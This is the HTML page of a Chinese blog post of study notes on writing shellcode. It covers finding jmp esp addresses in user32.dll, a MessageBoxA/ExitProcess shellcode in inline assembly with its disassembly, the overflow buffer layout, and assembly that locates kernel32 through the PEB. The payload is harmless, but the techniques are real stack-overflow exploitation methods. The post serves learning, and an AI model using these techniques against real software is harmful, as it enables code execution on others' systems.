<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="pwn,笔记," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0" />






<meta name="description" content="关于Shellcode的知识和实践&amp;emsp;&amp;emsp;平常都是使用网上的shellcode，现在学一学怎么写shellcode和shellcode的艺术。">
<meta name="keywords" content="pwn,笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="shellcode学习">
<meta property="og:url" content="http://www.wuweinan.top/2017/04/27/shellcode学习/index.html">
<meta property="og:site_name" content="wwNan's blog">
<meta property="og:description" content="关于Shellcode的知识和实践&amp;emsp;&amp;emsp;平常都是使用网上的shellcode，现在学一学怎么写shellcode和shellcode的艺术。">
<meta property="og:updated_time" content="2017-05-01T03:36:49.086Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="shellcode学习">
<meta name="twitter:description" content="关于Shellcode的知识和实践&amp;emsp;&amp;emsp;平常都是使用网上的shellcode，现在学一学怎么写shellcode和shellcode的艺术。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://www.wuweinan.top/2017/04/27/shellcode学习/"/>





  <title> shellcode学习 | wwNan's blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  














  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">wwNan's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">对于发烧的病人要趁热吃</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-commonweal">
          <a href="/404.html" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heartbeat"></i> <br />
            
            公益404
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://www.wuweinan.top/2017/04/27/shellcode学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Weinan Wu">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://i.imgur.com/umimEoA.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="wwNan's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                shellcode学习
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-04-27T13:51:57+08:00">
                2017-04-27
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="关于Shellcode的知识和实践"><a href="#关于Shellcode的知识和实践" class="headerlink" title="关于Shellcode的知识和实践"></a>关于Shellcode的知识和实践</h1><p>&emsp;&emsp;平常都是使用网上的shellcode，现在学一学怎么写shellcode和shellcode的艺术。<br><a id="more"></a></p>
<h2 id="jmp-esp"><a href="#jmp-esp" class="headerlink" title="jmp esp"></a>jmp esp</h2><p>&emsp;&emsp;缓冲区大小不足以塞下shellcode或无法精确定位到shellcode时，可以利用esp来作为一个跳板。esp中地址不会被破坏而且在函数返回时，esp指向返回地址的下一个位置。所以把shellcode放在返回地址之后，函数返回时先去执行jmp esp或call esp等指令，之后正好跳进shellcode。可以从和程序一起被加载进内存的动态链接库中获取jmp esp的地址，kernel32.dll,user32.dll等。以下代码可以获取地址。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div></pre></td><td class="code"><pre><div class="line">#include&lt;Windows.h&gt;</div><div class="line">#include&lt;stdio.h&gt;</div><div class="line">#define DLL_NAME &quot;user32.dll&quot;</div><div class="line"></div><div class="line">int main()</div><div class="line">&#123;</div><div class="line">	BYTE* ptr;</div><div class="line">	int position, address;</div><div class="line">	HINSTANCE handle;</div><div class="line">	BOOL done_flag = FALSE;</div><div class="line">	handle = LoadLibrary(DLL_NAME);</div><div class="line">	if (!handle)</div><div class="line">	&#123;</div><div class="line">		printf(&quot;load error !\n&quot;);</div><div class="line">		exit(0);</div><div class="line">	&#125;</div><div class="line">	ptr = (BYTE*)handle;</div><div class="line"></div><div class="line">	for (position = 0; !done_flag; position++)</div><div class="line">	&#123;</div><div class="line"></div><div class="line">			if (ptr[position] == 0xFF &amp;&amp; ptr[position + 1] == 0xE4)</div><div class="line">			&#123;</div><div class="line">				//0xFFE4 jmp esp</div><div class="line">				address = (int)ptr + position;</div><div class="line">				printf(&quot;OPCODE found at 0x%x\n&quot;, address);</div><div class="line">			&#125;</div><div class="line">	&#125;</div><div class="line">	return 0;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;这里选择0x7e493400处的jmp esp作为跳板，shellcode中调用的MessageboxA地址是0x7e4507ea，ExitProcess地址是0x7c81cafa。shellcode如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div></pre></td><td class="code"><pre><div class="line">#include&lt;Windows.h&gt;</div><div class="line"></div><div class="line">int main()</div><div class="line">&#123;</div><div class="line">	HINSTANCE libHandle;</div><div class="line">	char dll[11] = &quot;user32.dll&quot;;</div><div class="line">	libHandle = LoadLibrary(dll);</div><div class="line">	_asm &#123;</div><div class="line">		sub sp, 0x440</div><div class="line">		xor ebx,ebx</div><div class="line">		push ebx	//cut string</div><div class="line">		push 0x74736577	//fialwest</div><div class="line">		push 0x6c696166</div><div class="line"></div><div class="line">		mov eax,esp</div><div class="line">		push ebx</div><div class="line">		push eax</div><div class="line">		push eax</div><div class="line">		push ebx</div><div class="line"></div><div class="line">		mov eax,0x7e4507ea</div><div class="line">		call eax	//call MessageboxA</div><div class="line"></div><div class="line">		push ebx</div><div class="line">		mov eax, 0x7c81cafa</div><div class="line">		call eax	//call exit(0)</div><div class="line">	&#125;</div><div class="line">&#125;</div></pre></td></tr></table></figure></p>
<p>&emsp;&emsp;把shellcode转化为机器码，再根据缓冲区的情况，假设缓冲区大小为20字节。可以先填入24任意字节，再填入jmp esp地址0x7e493400，后面跟shellcode机器码。这样就不用去找buf的起始地址了。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">00401067  |.  33DB          xor     ebx, ebx</div><div class="line">00401069  |.  53            push    ebx</div><div class="line">0040106A  |.  68 77657374   push    74736577</div><div class="line">0040106F  |.  68 6661696C   push    6C696166</div><div class="line">00401074  |.  8BC4          mov     eax, esp</div><div class="line">00401076  |.  53            push    ebx</div><div class="line">00401077  |.  50            push    eax</div><div class="line">00401078  |.  50            push    eax</div><div class="line">00401079  |.  53            push    ebx</div><div class="line">0040107A  |.  B8 EA07457E   mov     eax, 7E4507EA</div><div class="line">0040107F  |.  FFD0          call    eax</div></pre></td></tr></table></figure></p>
<h2 id="动态定位API"><a href="#动态定位API" class="headerlink" title="动态定位API"></a>动态定位API</h2><p>&emsp;&emsp;动态链接库在不同的操作系统下，加载基址不同。所以要根据不同的系统动态定位API地址，提高shellcode兼容性。方法如下:</p>
<blockquote>
<p>FS为TEB的基址，基址+0x30放着PEB指针<br>PEB中偏移0X0C放着PEB_LDR_DATA结构体的指针<br>PEB_LDR_DATA偏移0X1C是指向模块初始化链表的指针<br>模块初始化链表第一个结点是ntdll.dll,第二个是kernell.dll，以此类推<br>找到kernel.dll后，基址加0x08是在加载基地址(1)，从加载基址偏移0X3C是PE头<br>PE头偏移0x78是函数导出表的指针，根据导出函数序号可以找到相应的函数偏移(2)<br>API的地址为(1)+(2)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">mov ebx,fs:[edx+0x30]	//PEB</div><div class="line">mov ecx,[ebx+0x0C]	//PLD</div><div class="line">mov ecx,[ecx+0x1C]	//list</div><div class="line">mov ecx,[ecx]		//kernel.dll entry</div><div class="line">mov ebp,[ecx+0x08]	//base address</div></pre></td></tr></table></figure></p>
</blockquote>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/笔记/" rel="tag"># 笔记</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/04/29/堆基础学习/" rel="next" title="堆基础学习">
                <i class="fa fa-chevron-left"></i> 堆基础学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/04/20/Mini-CRT/" rel="prev" title="Mini CRT的实现">
                Mini CRT的实现 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="http://i.imgur.com/umimEoA.png"
               alt="Weinan Wu" />
          <p class="site-author-name" itemprop="name">Weinan Wu</p>
           
              <p class="site-description motion-element" itemprop="description">手术进行中…医生发现病人漏油了…于是找来了修车师傅 修车师傅称自己只会修车，不会修洗衣机</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/u/3537471693" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-weibo"></i>
                  
                  Weibo
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://showlinkroom.me/" title="l1nk3dHouse" target="_blank">l1nk3dHouse</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#关于Shellcode的知识和实践"><span class="nav-number">1.</span> <span class="nav-text">关于Shellcode的知识和实践</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#jmp-esp"><span class="nav-number">1.1.</span> <span class="nav-text">jmp esp</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#动态定位API"><span class="nav-number">1.2.</span> <span class="nav-text">动态定位API</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Weinan Wu</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  








  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>



  


  




	





  





  





  






  





  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

</body>
</html>
